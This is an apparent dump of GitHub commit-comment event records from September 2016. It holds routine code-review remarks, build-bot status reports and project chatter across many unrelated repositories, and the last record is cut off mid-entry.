{"id":"4541587083","type":"CommitCommentEvent","actor":{"login":"techtonik"},"repo":{"name":"nmap/npcap"},"payload":{"comment":{"id":18967264,"position":null,"line":null,"path":null,"commit_id":"87b126d6c9887bb05f0164953f1eb89a4888c56e","created_at":"2016-09-09T18:18:42Z","updated_at":"2016-09-09T18:18:42Z","body":"I've got 0x00009086 on previous resume from suspend. I don't know if it is related to installed `0.09 r5`. But now Wireshark work without any additional settings. Thanks!"}},"created_at":"2016-09-09T18:18:42Z"}
{"id":"4541588162","type":"CommitCommentEvent","actor":{"login":"dezgeg"},"repo":{"name":"NixOS/nixpkgs"},"payload":{"comment":{"id":18967267,"position":7,"line":186,"path":"nixos/lib/testing.nix","commit_id":"4dcb685af940efd74a7b2b66ae917129ef232d83","created_at":"2016-09-09T18:18:53Z","updated_at":"2016-09-09T18:18:53Z","body":"It's still used here."}},"created_at":"2016-09-09T18:18:53Z"}
{"id":"4541591532","type":"CommitCommentEvent","actor":{"login":"tatwell"},"repo":{"name":"sharissis-brei/cascade-assets"},"payload":{"comment":{"id":18967278,"position":9,"line":217,"path":"app/assets/javascripts/cascade/carousel.js","commit_id":"2b6b045046fc876f4c4e6933e7acdad36a178791","created_at":"2016-09-09T18:19:33Z","updated_at":"2016-09-09T18:19:33Z","body":"This doesn't break anything? Any idea why these `href` assignments exist in the first place?\r\n\r\nAs a rule, I favor removing commented-out code all together unless there is comment explaining why it's being preserved."}},"created_at":"2016-09-09T18:19:33Z"}
{"id":"4541591694","type":"CommitCommentEvent","actor":{"login":"osigida"},"repo":{"name":"LibertyGlobal/sensu-plugins-graphite"},"payload":{"comment":{"id":18967279,"position":null,"line":null,"path":null,"commit_id":"d2a348c0ac1cfc8f5d67bcdca1ed66aee72167db","created_at":"2016-09-09T18:19:35Z","updated_at":"2016-09-09T18:19:35Z","body":"PUL REQUEST!"}},"created_at":"2016-09-09T18:19:35Z"}
{"id":"4541594717","type":"CommitCommentEvent","actor":{"login":"techtonik"},"repo":{"name":"nmap/npcap"},"payload":{"comment":{"id":18967290,"position":13,"line":23,"path":"installer/Deploy.ps1","commit_id":"d99a3ceaef5412688e1ec71872c4a32b29f9a23f","created_at":"2016-09-09T18:20:11Z","updated_at":"2016-09-09T18:20:11Z","body":"Just wonder what is the role of these servers? What could be if MITM is played on them?"}},"created_at":"2016-09-09T18:20:11Z"}
{"id":"4541600206","type":"CommitCommentEvent","actor":{"login":"Narflex"},"repo":{"name":"google/sagetv"},"payload":{"comment":{"id":18967303,"position":null,"line":null,"path":null,"commit_id":"a75c8bdfb0726c7a09406dbf14803e5aa47a9c02","created_at":"2016-09-09T18:21:12Z","updated_at":"2016-09-09T18:21:12Z","body":"@atarijeff \r\n\r\nCan you explain more why you did the change on line 4270+ (in the new code) above? This is breaking things when there are actually Unicode chars in the filename: https://forums.sagetv.com/forums/showthread.php?p=592336#post592336"}},"created_at":"2016-09-09T18:21:12Z"}
{"id":"4541601258","type":"CommitCommentEvent","actor":{"login":"victorporof"},"repo":{"name":"jsantell/tofino"},"payload":{"comment":{"id":18967304,"position":2,"line":35,"path":"app/ui/browser-modern/selectors/pages.js","commit_id":"163d95eb480c3c195fe281bcf47be7d9068c9e12","created_at":"2016-09-09T18:21:25Z","updated_at":"2016-09-09T18:21:25Z","body":"Might want to update this selector to use the newly added 'getPageIndexById'"}},"created_at":"2016-09-09T18:21:25Z"}
{"id":"4541604490","type":"CommitCommentEvent","actor":{"login":"Iamblichos"},"repo":{"name":"LoneGazebo/Community-Patch-DLL"},"payload":{"comment":{"id":18967311,"position":null,"line":null,"path":null,"commit_id":"dee7a217f715d399ce5e73660346b44976c660cd","created_at":"2016-09-09T18:22:03Z","updated_at":"2016-09-09T18:22:03Z","body":"well, when you use the full VP, that file is handled by More Luxuries...since More Luxuries isn't in the Repository I added it into the Repository ...should be a folder called More Luxuries/Lua/AssignStartingPlots.lua"}},"created_at":"2016-09-09T18:22:03Z"}
{"id":"4541605402","type":"CommitCommentEvent","actor":{"login":"sharissis-brei"},"repo":{"name":"sharissis-brei/cascade-assets"},"payload":{"comment":{"id":18967313,"position":9,"line":217,"path":"app/assets/javascripts/cascade/carousel.js","commit_id":"2b6b045046fc876f4c4e6933e7acdad36a178791","created_at":"2016-09-09T18:22:14Z","updated_at":"2016-09-09T18:22:14Z","body":"In theory, it shouldn't break anything since typically, click events are what trigger carousel events. However, we won't have a way of knowing until we deploy this to the CMS and test.\r\n\r\nI removed these because of an error found in our accessibility testing, but if you think the hrefs should be left in, I can revert this."}},"created_at":"2016-09-09T18:22:14Z"}
{"id":"4541608632","type":"CommitCommentEvent","actor":{"login":"mppfiles"},"repo":{"name":"ivo692009/JavaPractico"},"payload":{"comment":{"id":18967326,"position":5,"line":36,"path":"src/java/Servlet/NuevoServlet.java","commit_id":"48c79079faafe5b2199c684b285453300792138d","created_at":"2016-09-09T18:22:53Z","updated_at":"2016-09-09T18:22:53Z","body":"WTF???"}},"created_at":"2016-09-09T18:22:53Z"}
{"id":"4541612791","type":"CommitCommentEvent","actor":{"login":"TheComputerGuy96"},"repo":{"name":"ishantvivek/android_device_samsung_kylepro"},"payload":{"comment":{"id":18967340,"position":null,"line":null,"path":null,"commit_id":"3004462f2785daf0f3a112a718350d7bbe5b543f","created_at":"2016-09-09T18:23:41Z","updated_at":"2016-09-09T18:23:41Z","body":"CM has translations for network choices, so you should use them:\r\nhttps://github.com/ghsr/build_tools/blob/cm-13.0/patches/packages_services_Telephony.patch"}},"created_at":"2016-09-09T18:23:41Z"}
{"id":"4541615087","type":"CommitCommentEvent","actor":{"login":"mikepenz"},"repo":{"name":"mikepenz/AboutLibraries"},"payload":{"comment":{"id":18967345,"position":null,"line":null,"path":null,"commit_id":"8363e62f56ec9a4a868eeb5c9c98a2518b1a8795","created_at":"2016-09-09T18:24:10Z","updated_at":"2016-09-09T18:24:10Z","body":"@7172 not really sorry. But you will find enough tutorials online"}},"created_at":"2016-09-09T18:24:10Z"}
{"id":"4541617109","type":"CommitCommentEvent","actor":{"login":"genehack"},"repo":{"name":"atoomic/Git-Wrapper"},"payload":{"comment":{"id":18967351,"position":5,"line":77,"path":"t/basic.t","commit_id":"39efb579d72c8eabf8f7ba45f95c927aa5b69168","created_at":"2016-09-09T18:24:33Z","updated_at":"2016-09-09T18:24:33Z","body":"this is fixed in master, fwiw "}},"created_at":"2016-09-09T18:24:33Z"}
{"id":"4541618969","type":"CommitCommentEvent","actor":{"login":"vishr"},"repo":{"name":"labstack/echo"},"payload":{"comment":{"id":18967360,"position":null,"line":null,"path":null,"commit_id":"2d772e02cafe06456a1cb5f887248fc79ce9e5f1","created_at":"2016-09-09T18:24:55Z","updated_at":"2016-09-09T18:24:55Z","body":"`Context()` method was dropped to let people extend `echo.Context` with custom APIs, there was conflict in method and property name `Context` so I had to drop it.  More: https://echo.labstack.com/guide/context\r\n\r\nLooking at your failing example:\r\n1. It is the same behavior with older version of `context.go`\r\n2. You are putting it in recursion yourself by setting parent as `echoContext`"}},"created_at":"2016-09-09T18:24:55Z"}
{"id":"4541619134","type":"CommitCommentEvent","actor":{"login":"javierportillo"},"repo":{"name":"sigmalibre/inventarios"},"payload":{"comment":{"id":18967361,"position":null,"line":null,"path":null,"commit_id":"08c1b0ef32dc9f350b0f650ae0cce6e1573b8e5e","created_at":"2016-09-09T18:24:56Z","updated_at":"2016-09-09T18:24:56Z","body":"Para que funcione el auto load debes correr el comando (una sola vez):\r\n`php composer.phar dump-autoload -o`\r\n\r\nAsí en lugar de usar requires, nada más le pones un namespace a las clases y composer las incluye automáticamente.\r\n\r\nhttps://getcomposer.org/doc/04-schema.md#autoload"}},"created_at":"2016-09-09T18:24:56Z"}
{"id":"4541625149","type":"CommitCommentEvent","actor":{"login":"NTaxi5"},"repo":{"name":"NTaxi5/COMMIT"},"payload":{"comment":{"id":18967383,"position":null,"line":null,"path":null,"commit_id":"1746dae1a18577020037239db44851388fbf1429","created_at":"2016-09-09T18:26:08Z","updated_at":"2016-09-09T18:26:08Z","body":"2 Commit\r\n3 Commit"}},"created_at":"2016-09-09T18:26:08Z"}
{"id":"4541628136","type":"CommitCommentEvent","actor":{"login":"NTaxi5"},"repo":{"name":"NTaxi5/COMMIT"},"payload":{"comment":{"id":18967387,"position":1,"line":1,"path":"README.md","commit_id":"1746dae1a18577020037239db44851388fbf1429","created_at":"2016-09-09T18:26:42Z","updated_at":"2016-09-09T18:26:42Z","body":"Commit Version 3"}},"created_at":"2016-09-09T18:26:42Z"}
{"id":"4541630757","type":"CommitCommentEvent","actor":{"login":"nrel-bot-3"},"repo":{"name":"NREL/OpenStudio"},"payload":{"comment":{"id":18967392,"position":null,"line":null,"path":null,"commit_id":"e47682d29063ceb7de433bc343bbe1a895c05cda","created_at":"2016-09-09T18:27:11Z","updated_at":"2016-09-09T18:27:11Z","body":"os_2.0_develop_signal_slot_bug (kbenne) - x86_64-MacOS-10.10-clang: Build Failed\n\n\n\n<a href='https://nrel.github.io/OpenStudioBuildResults/OpenStudio-e47682d29063ceb7de433bc343bbe1a895c05cda-x86_64-MacOS-10.10-clang.html'>![Build Badge](http://img.shields.io/badge/build%20status-failing-red.svg)</a> <a href='https://nrel.github.io/OpenStudioBuildResults/OpenStudio-e47682d29063ceb7de433bc343bbe1a895c05cda-x86_64-MacOS-10.10-clang.html'>![Test Badge](http://img.shields.io/badge/tests%20passed-NA-red.svg)</a> \n"}},"created_at":"2016-09-09T18:27:11Z"}
{"id":"4541630844","type":"CommitCommentEvent","actor":{"login":"Iamblichos"},"repo":{"name":"LoneGazebo/Community-Patch-DLL"},"payload":{"comment":{"id":18967393,"position":null,"line":null,"path":null,"commit_id":"dee7a217f715d399ce5e73660346b44976c660cd","created_at":"2016-09-09T18:27:12Z","updated_at":"2016-09-09T18:27:12Z","body":"So you should have 3 of AssignStartingPlots.lua now.\r\n\r\n1) in CP Lua folder\r\n2) in CBO Lua folder\r\n3) the one that exists in More Luxuries that needs to be overwritten with the new one I created for that one.\r\n\r\n#'s 1 and 2 are identical, #3 is if you are using More Luxuries and now accounts for pseudo natural wonders. All are basically one liner changes."}},"created_at":"2016-09-09T18:27:12Z"}
{"id":"4541633453","type":"CommitCommentEvent","actor":{"login":"NTaxi5"},"repo":{"name":"NTaxi5/COMMIT"},"payload":{"comment":{"id":18967396,"position":1,"line":1,"path":"README.md","commit_id":"1746dae1a18577020037239db44851388fbf1429","created_at":"2016-09-09T18:27:37Z","updated_at":"2016-09-09T18:27:37Z","body":"Commit Version 4"}},"created_at":"2016-09-09T18:27:37Z"}
{"id":"4541634023","type":"CommitCommentEvent","actor":{"login":"javierluraschi"},"repo":{"name":"rstudio/sparklyr"},"payload":{"comment":{"id":18967399,"position":7,"line":268,"path":"R/spark_compile.R","commit_id":"b505780cd9f684b2a23c6017560808bf13d18cec","created_at":"2016-09-09T18:27:44Z","updated_at":"2016-09-09T18:27:44Z","body":"Looks like you fixed this, thanks!"}},"created_at":"2016-09-09T18:27:44Z"}
{"id":"4541634889","type":"CommitCommentEvent","actor":{"login":"MoshkinAlexey"},"repo":{"name":"MoshkinAlexey/KotlinAsFirst2016"},"payload":{"comment":{"id":18967402,"position":null,"line":null,"path":null,"commit_id":"999149c9a960923067991d74f85584b66e4fcc01","created_at":"2016-09-09T18:27:55Z","updated_at":"2016-09-09T18:27:55Z","body":"Хм, все 5 тестов из папки test она прошла..."}},"created_at":"2016-09-09T18:27:55Z"}
{"id":"4541637366","type":"CommitCommentEvent","actor":{"login":"TheComputerGuy96"},"repo":{"name":"ishantvivek/android_device_samsung_kylepro"},"payload":{"comment":{"id":18967412,"position":null,"line":null,"path":null,"commit_id":"3004462f2785daf0f3a112a718350d7bbe5b543f","created_at":"2016-09-09T18:28:23Z","updated_at":"2016-09-09T18:28:23Z","body":"And there are even more references for it:\r\nhttps://github.com/CyanogenMod/android_packages_services_Telephony/blob/cm-13.0/res/values-lt/cm_strings.xml#L109"}},"created_at":"2016-09-09T18:28:23Z"}
{"id":"4541642831","type":"CommitCommentEvent","actor":{"login":"iapazmino"},"repo":{"name":"twstrike/otrv4"},"payload":{"comment":{"id":18967422,"position":7,"line":7,"path":"otrv4.txt","commit_id":"661ff8897438ee22c9f39256ed615b1f3a32574b","created_at":"2016-09-09T18:29:25Z","updated_at":"2016-09-09T18:29:25Z","body":"Agreed."}},"created_at":"2016-09-09T18:29:25Z"}
{"id":"4541642855","type":"CommitCommentEvent","actor":{"login":"josevalim"},"repo":{"name":"elixir-ecto/ecto"},"payload":{"comment":{"id":18967423,"position":61,"line":1032,"path":"lib/ecto/schema.ex","commit_id":"1eacc2693a0ec7c79a6813bee70c72155136c278","created_at":"2016-09-09T18:29:26Z","updated_at":"2016-09-09T18:29:26Z","body":"I have copied those tests from embedded_test, which means that embedded_test has no tests for :update as well. Could you please send a PR that adds tests for both files? "}},"created_at":"2016-09-09T18:29:26Z"}
{"id":"4541643056","type":"CommitCommentEvent","actor":{"login":"Iamblichos"},"repo":{"name":"LoneGazebo/Community-Patch-DLL"},"payload":{"comment":{"id":18967424,"position":null,"line":null,"path":null,"commit_id":"dee7a217f715d399ce5e73660346b44976c660cd","created_at":"2016-09-09T18:29:28Z","updated_at":"2016-09-09T18:29:28Z","body":"Hopefully that's all clear as mud."}},"created_at":"2016-09-09T18:29:28Z"}
{"id":"4541644815","type":"CommitCommentEvent","actor":{"login":"NTaxi5"},"repo":{"name":"NTaxi5/COMMIT"},"payload":{"comment":{"id":18967429,"position":null,"line":null,"path":null,"commit_id":"91616f217e39454ead414bc91157df1955a75291","created_at":"2016-09-09T18:29:49Z","updated_at":"2016-09-09T18:29:49Z","body":"Committing a comment"}},"created_at":"2016-09-09T18:29:49Z"}
{"id":"4541655160","type":"CommitCommentEvent","actor":{"login":"JadenGeller"},"repo":{"name":"realm/realm-cocoa"},"payload":{"comment":{"id":18967454,"position":38,"line":567,"path":"Realm.xcodeproj/project.pbxproj","commit_id":"91b54ed4dc271c9539709d33c465a740dbf837bc","created_at":"2016-09-09T18:31:44Z","updated_at":"2016-09-09T18:31:44Z","body":"Not sure why this is here."}},"created_at":"2016-09-09T18:31:44Z"}
{"id":"4541659582","type":"CommitCommentEvent","actor":{"login":"ishantvivek"},"repo":{"name":"ishantvivek/android_device_samsung_kylepro"},"payload":{"comment":{"id":18967458,"position":null,"line":null,"path":null,"commit_id":"3004462f2785daf0f3a112a718350d7bbe5b543f","created_at":"2016-09-09T18:32:34Z","updated_at":"2016-09-09T18:32:34Z","body":"No,this patch won't work, cm changed the method of changing network selection. \r\nhttps://github.com/CyanogenMod/android_packages_services_Telephony/commit/da57833438ed7fdb34164cc5faee0a44054fbb45\r\nhttps://github.com/CyanogenMod/android_packages_apps_Settings/commit/3a85ba8411921f76c334515180ea060768f007b2\r\nWe can't patch only telephony, in that case we need to patch settings too. Instead of patching so many things, this is the best solution.As they support overlaying of network selection via dt now. \r\nhttps://github.com/CyanogenMod/android_packages_services_Telephony/commit/f4ccdc155fa2929026de150e7666f9f1ed21ba35\r\nI don't care about translations, because keeping translation in mind and breaking other stuffs isn't a good idea. And i don't think, someone is so dumb that he don't understand one letter English word!\r\n"}},"created_at":"2016-09-09T18:32:34Z"}
{"id":"4541661215","type":"CommitCommentEvent","actor":{"login":"budnyjj"},"repo":{"name":"Workgood/courses_python"},"payload":{"comment":{"id":18967461,"position":3,"line":3,"path":"sequence.py","commit_id":"246a3d849e094d79b60385163671aa112f38eaca","created_at":"2016-09-09T18:32:53Z","updated_at":"2016-09-09T18:32:53Z","body":"range(1, num+1) ?"}},"created_at":"2016-09-09T18:32:53Z"}
{"id":"4541661448","type":"CommitCommentEvent","actor":{"login":"Never2beamrs"},"repo":{"name":"rprichard/winpty"},"payload":{"comment":{"id":18967462,"position":null,"line":null,"path":null,"commit_id":"37624c05f4d66322f74e9c4c28a48cf1a16b6e30","created_at":"2016-09-09T18:32:56Z","updated_at":"2016-09-09T18:32:56Z","body":"![screenshot_20160909-141028](https://cloud.githubusercontent.com/assets/20492640/18398323/450465d0-769a-11e6-81e2-ef6f1123fb89.png)\r\n"}},"created_at":"2016-09-09T18:32:56Z"}
{"id":"4541662380","type":"CommitCommentEvent","actor":{"login":"joakime"},"repo":{"name":"GoogleCloudPlatform/getting-started-java"},"payload":{"comment":{"id":18967464,"position":34,"line":76,"path":"helloworld-jsp/pom.xml","commit_id":"1cae0c439040430a46e50253a5b0ff628381c79e","created_at":"2016-09-09T18:33:09Z","updated_at":"2016-09-09T18:33:09Z","body":"This breaks the maven build btw."}},"created_at":"2016-09-09T18:33:09Z"}
{"id":"4541664777","type":"CommitCommentEvent","actor":{"login":"kevinushey"},"repo":{"name":"rstudio/rstudio"},"payload":{"comment":{"id":18967467,"position":6,"line":128,"path":"src/cpp/session/modules/rmarkdown/NotebookExec.cpp","commit_id":"487867deff2be06aeedb22a647610dbaff1cc0ec","created_at":"2016-09-09T18:33:36Z","updated_at":"2016-09-09T18:33:36Z","body":"It looks like `fig.asp` is used by knitr only for computing `fig.height` from `fig.width`; not in the other direction.\r\n\r\nGood point re: respecting `fig.asp` when no other figure dimensions are set! I'll make that change as well."}},"created_at":"2016-09-09T18:33:36Z"}
{"id":"4541666863","type":"CommitCommentEvent","actor":{"login":"laneb"},"repo":{"name":"TresAmigosSD/SMV"},"payload":{"comment":{"id":18967473,"position":null,"line":null,"path":null,"commit_id":"1d69c8c2cedf51448750360278d8845108c1247b","created_at":"2016-09-09T18:34:03Z","updated_at":"2016-09-09T18:34:03Z","body":"(this was me)"}},"created_at":"2016-09-09T18:34:03Z"}
{"id":"4541670659","type":"CommitCommentEvent","actor":{"login":"tatwell"},"repo":{"name":"sharissis-brei/cascade-assets"},"payload":{"comment":{"id":18967481,"position":9,"line":217,"path":"app/assets/javascripts/cascade/carousel.js","commit_id":"2b6b045046fc876f4c4e6933e7acdad36a178791","created_at":"2016-09-09T18:34:46Z","updated_at":"2016-09-09T18:34:46Z","body":"I'd prefer removing them if they're not required, especially if they don't conform to accessibility standard. If nothing breaks, I'm good with change."}},"created_at":"2016-09-09T18:34:46Z"}
{"id":"4541673940","type":"CommitCommentEvent","actor":{"login":"ishantvivek"},"repo":{"name":"ishantvivek/android_device_samsung_kylepro"},"payload":{"comment":{"id":18967488,"position":null,"line":null,"path":null,"commit_id":"3004462f2785daf0f3a112a718350d7bbe5b543f","created_at":"2016-09-09T18:35:24Z","updated_at":"2016-09-09T18:35:24Z","body":">And there are even more references for it:\r\nhttps://github.com/CyanogenMod/android_packages_services_Telephony/blob/cm-13.0/res/values-lt/cm_strings.xml#L109\r\nThese references are for some other purpose. Don't go on words "}},"created_at":"2016-09-09T18:35:24Z"}
{"id":"4541674685","type":"CommitCommentEvent","actor":{"login":"absurdlyobfuscated"},"repo":{"name":"absurdlyobfuscated/RedditSharp"},"payload":{"comment":{"id":18967490,"position":null,"line":null,"path":null,"commit_id":"88d83cf6524e13fc727d2a23556bfa0616f6b351","created_at":"2016-09-09T18:35:32Z","updated_at":"2016-09-09T18:35:32Z","body":"Thanks for catching that! Fixed in most recent commit."}},"created_at":"2016-09-09T18:35:32Z"}
{"id":"4541677553","type":"CommitCommentEvent","actor":{"login":"tonio155"},"repo":{"name":"tonio155/Travelly_WDI_Project_3"},"payload":{"comment":{"id":18967498,"position":null,"line":null,"path":null,"commit_id":"57dcdfde92d3dcbb547f1cdadbfc76c00bb35698","created_at":"2016-09-09T18:36:05Z","updated_at":"2016-09-09T18:36:05Z","body":"<a href=\"https:&#x2F;&#x2F;trello.com&#x2F;c&#x2F;vcm78zIs&#x2F;48-photo-uploader\"><img src=\"https:&#x2F;&#x2F;github.trello.services&#x2F;images&#x2F;trello-icon.png\" width=\"12\" height=\"12\"> Photo Uploader</a>"}},"created_at":"2016-09-09T18:36:05Z"}
{"id":"4541678130","type":"CommitCommentEvent","actor":{"login":"tonio155"},"repo":{"name":"tonio155/Travelly_WDI_Project_3"},"payload":{"comment":{"id":18967501,"position":null,"line":null,"path":null,"commit_id":"29c053e1cf3528e0c762de745c7a57e34be2c543","created_at":"2016-09-09T18:36:12Z","updated_at":"2016-09-09T18:36:12Z","body":"<a href=\"https:&#x2F;&#x2F;trello.com&#x2F;c&#x2F;vcm78zIs&#x2F;48-photo-uploader\"><img src=\"https:&#x2F;&#x2F;github.trello.services&#x2F;images&#x2F;trello-icon.png\" width=\"12\" height=\"12\"> Photo Uploader</a>"}},"created_at":"2016-09-09T18:36:12Z"}
{"id":"4541678240","type":"CommitCommentEvent","actor":{"login":"allasm"},"repo":{"name":"phenotips/phenotips"},"payload":{"comment":{"id":18967502,"position":9,"line":198,"path":"components/pedigree/resources/src/main/resources/pedigree/model/export.js","commit_id":"b752699cb71d100ddd26d037090bfd3d0c171c68","created_at":"2016-09-09T18:36:13Z","updated_at":"2016-09-09T18:36:13Z","body":"I think ideally we should also ask if \"carrier\" and \"presymptomatic\" should be included as well (probably sometimes they should and sometimes they shouldn't. But need to ask someone who knows user req better."}},"created_at":"2016-09-09T18:36:13Z"}
{"id":"4541678398","type":"CommitCommentEvent","actor":{"login":"azyobuzin"},"repo":{"name":"azyobuzin/CountableSharp"},"payload":{"comment":{"id":18967505,"position":null,"line":null,"path":null,"commit_id":"4c6f444c62335e382c784c4d4b1d6282483e0fd4","created_at":"2016-09-09T18:36:15Z","updated_at":"2016-09-09T18:36:15Z","body":"Range.Contains のテストに int.MinValue のケースを入れ忘れた"}},"created_at":"2016-09-09T18:36:15Z"}
{"id":"4541680724","type":"CommitCommentEvent","actor":{"login":"tonio155"},"repo":{"name":"tonio155/Travelly_WDI_Project_3"},"payload":{"comment":{"id":18967511,"position":null,"line":null,"path":null,"commit_id":"29c053e1cf3528e0c762de745c7a57e34be2c543","created_at":"2016-09-09T18:36:41Z","updated_at":"2016-09-09T18:36:41Z","body":"<a href=\"https:&#x2F;&#x2F;trello.com&#x2F;c&#x2F;xkgkcrqY&#x2F;14-user-module\"><img src=\"https:&#x2F;&#x2F;github.trello.services&#x2F;images&#x2F;trello-icon.png\" width=\"12\" height=\"12\"> User Module</a>"}},"created_at":"2016-09-09T18:36:41Z"}
{"id":"4541682040","type":"CommitCommentEvent","actor":{"login":"tonio155"},"repo":{"name":"tonio155/Travelly_WDI_Project_3"},"payload":{"comment":{"id":18967516,"position":null,"line":null,"path":null,"commit_id":"29c053e1cf3528e0c762de745c7a57e34be2c543","created_at":"2016-09-09T18:36:58Z","updated_at":"2016-09-09T18:36:58Z","body":"<a href=\"https:&#x2F;&#x2F;trello.com&#x2F;c&#x2F;GhynAzKJ&#x2F;2-authentication\"><img src=\"https:&#x2F;&#x2F;github.trello.services&#x2F;images&#x2F;trello-icon.png\" width=\"12\" height=\"12\"> Authentication</a>"}},"created_at":"2016-09-09T18:36:58Z"}
{"id":"4541682844","type":"CommitCommentEvent","actor":{"login":"tonio155"},"repo":{"name":"tonio155/Travelly_WDI_Project_3"},"payload":{"comment":{"id":18967521,"position":null,"line":null,"path":null,"commit_id":"29c053e1cf3528e0c762de745c7a57e34be2c543","created_at":"2016-09-09T18:37:08Z","updated_at":"2016-09-09T18:37:08Z","body":"<a href=\"https:&#x2F;&#x2F;trello.com&#x2F;c&#x2F;gdEQFyV1&#x2F;1-main-structure\"><img src=\"https:&#x2F;&#x2F;github.trello.services&#x2F;images&#x2F;trello-icon.png\" width=\"12\" height=\"12\"> Main Structure</a>"}},"created_at":"2016-09-09T18:37:08Z"}
{"id":"4541685013","type":"CommitCommentEvent","actor":{"login":"tonio155"},"repo":{"name":"tonio155/Travelly_WDI_Project_3"},"payload":{"comment":{"id":18967528,"position":null,"line":null,"path":null,"commit_id":"57dcdfde92d3dcbb547f1cdadbfc76c00bb35698","created_at":"2016-09-09T18:37:32Z","updated_at":"2016-09-09T18:37:32Z","body":"<a href=\"https:&#x2F;&#x2F;trello.com&#x2F;c&#x2F;GhynAzKJ&#x2F;2-authentication\"><img src=\"https:&#x2F;&#x2F;github.trello.services&#x2F;images&#x2F;trello-icon.png\" width=\"12\" height=\"12\"> Authentication</a>"}},"created_at":"2016-09-09T18:37:32Z"}
{"id":"4541689387","type":"CommitCommentEvent","actor":{"login":"fenollp"},"repo":{"name":"rg3/youtube-dl"},"payload":{"comment":{"id":18967536,"position":null,"line":null,"path":null,"commit_id":"8258f4457ce37fd24fb6044b5948f1816fcf3b94","created_at":"2016-09-09T18:38:22Z","updated_at":"2016-09-09T18:38:22Z","body":"Thanks! As always you guys are fast!\r\n\r\nNote: that url in the commit is a 404"}},"created_at":"2016-09-09T18:38:22Z"}
{"id":"4541691439","type":"CommitCommentEvent","actor":{"login":"budnyjj"},"repo":{"name":"Workgood/courses_python"},"payload":{"comment":{"id":18967540,"position":null,"line":null,"path":null,"commit_id":"246a3d849e094d79b60385163671aa112f38eaca","created_at":"2016-09-09T18:38:46Z","updated_at":"2016-09-09T18:38:46Z","body":"Какова алгоритмическая сложность этого алгоритма?\r\nМожно ли её улучшить?"}},"created_at":"2016-09-09T18:38:46Z"}
{"id":"4541691710","type":"CommitCommentEvent","actor":{"login":"borshop"},"repo":{"name":"basho/riak_kv"},"payload":{"comment":{"id":18967541,"position":null,"line":null,"path":null,"commit_id":"ff12939bee168cd9aff19d766ecedb0e595bb2b0","created_at":"2016-09-09T18:38:49Z","updated_at":"2016-09-09T18:38:49Z","body":"saw approval from jvoegele\nat https://github.com/basho/riak_kv/commit/ff12939bee168cd9aff19d766ecedb0e595bb2b0"}},"created_at":"2016-09-09T18:38:49Z"}
{"id":"4541691756","type":"CommitCommentEvent","actor":{"login":"borshop"},"repo":{"name":"basho/riak_kv"},"payload":{"comment":{"id":18967542,"position":null,"line":null,"path":null,"commit_id":"ff12939bee168cd9aff19d766ecedb0e595bb2b0","created_at":"2016-09-09T18:38:49Z","updated_at":"2016-09-09T18:38:49Z","body":"merging basho/riak_kv/cuttlefish-commented = ff12939b into borshop-integration-1477-cuttlefish-commented"}},"created_at":"2016-09-09T18:38:49Z"}
{"id":"4541691783","type":"CommitCommentEvent","actor":{"login":"borshop"},"repo":{"name":"basho/riak_kv"},"payload":{"comment":{"id":18967543,"position":null,"line":null,"path":null,"commit_id":"ff12939bee168cd9aff19d766ecedb0e595bb2b0","created_at":"2016-09-09T18:38:50Z","updated_at":"2016-09-09T18:38:50Z","body":"basho/riak_kv/cuttlefish-commented = ff12939b merged ok, testing candidate = 61fb9c4a"}},"created_at":"2016-09-09T18:38:50Z"}
{"id":"4541694699","type":"CommitCommentEvent","actor":{"login":"tgmaxx"},"repo":{"name":"emoncms/graph"},"payload":{"comment":{"id":18967553,"position":null,"line":null,"path":null,"commit_id":"25635447a09ee048f6d87f2d53e148405137efc7","created_at":"2016-09-09T18:39:21Z","updated_at":"2016-09-09T18:39:21Z","body":"Hi Trystan,\r\nI can create a graph, but when I go to a dashboard to place it, I get the following error:\r\nNotice: Undefined property: stdClass::$name in /var/www/emoncms/Modules/graph/widget/graph_widget.php on line 11\r\n\r\n"}},"created_at":"2016-09-09T18:39:21Z"}
{"id":"4541695787","type":"CommitCommentEvent","actor":{"login":"borshop"},"repo":{"name":"basho/yokozuna"},"payload":{"comment":{"id":18967559,"position":null,"line":null,"path":null,"commit_id":"df4a3cd95507bdbe17c38c6ebf3c3c1b8bbae5ac","created_at":"2016-09-09T18:39:33Z","updated_at":"2016-09-09T18:39:33Z","body":"saw approval from jvoegele\nat https://github.com/basho/yokozuna/commit/df4a3cd95507bdbe17c38c6ebf3c3c1b8bbae5ac"}},"created_at":"2016-09-09T18:39:33Z"}
{"id":"4541695842","type":"CommitCommentEvent","actor":{"login":"borshop"},"repo":{"name":"basho/yokozuna"},"payload":{"comment":{"id":18967560,"position":null,"line":null,"path":null,"commit_id":"df4a3cd95507bdbe17c38c6ebf3c3c1b8bbae5ac","created_at":"2016-09-09T18:39:34Z","updated_at":"2016-09-09T18:39:34Z","body":"merging basho/yokozuna/cuttlefish-commented = df4a3cd9 into borshop-integration-675-cuttlefish-commented"}},"created_at":"2016-09-09T18:39:34Z"}
{"id":"4541695871","type":"CommitCommentEvent","actor":{"login":"borshop"},"repo":{"name":"basho/yokozuna"},"payload":{"comment":{"id":18967561,"position":null,"line":null,"path":null,"commit_id":"df4a3cd95507bdbe17c38c6ebf3c3c1b8bbae5ac","created_at":"2016-09-09T18:39:34Z","updated_at":"2016-09-09T18:39:34Z","body":"basho/yokozuna/cuttlefish-commented = df4a3cd9 merged ok, testing candidate = 50ab4499"}},"created_at":"2016-09-09T18:39:34Z"}
{"id":"4541703283","type":"CommitCommentEvent","actor":{"login":"nrel-bot"},"repo":{"name":"NREL/EnergyPlus"},"payload":{"comment":{"id":18967568,"position":null,"line":null,"path":null,"commit_id":"e27c97cdcbfc71b3269bbcc7b2a7954dd0bec966","created_at":"2016-09-09T18:41:00Z","updated_at":"2016-09-09T18:41:00Z","body":"test_build_branch (lefticus) - i386-Windows-7-VisualStudio-12: Tests Failed (1536 of 2048 tests passed, 37 test warnings)\n\n * 539 tests had: AUD diffs.\n * 530 tests had: EIO diffs.\n * 422 tests had: ESO small diffs.\n * 360 tests had: MTR small diffs.\n * 512 tests had: RDD diffs.\n * 497 tests had: Table big diffs.\n * 116 tests had: ESO big diffs.\n * 88 tests had: ERR diffs.\n * 420 tests had: BND diffs.\n * 76 tests had: MTR big diffs.\n * 4 tests had: SSZ big diffs.\n * 15 tests had: MDD diffs.\n * 35 tests had: MTD diffs.\n * 5 tests had: ZSZ big diffs.\n * 29 tests had: DXF diffs.\n * 3 tests had: delightin diffs.\n * 3 tests had: delightout diffs.\n * 1 test had: SSZ small diffs.\n * 1 test had: ZSZ small diffs.\n * 1 test had: SHD diffs.\n\n\n<a 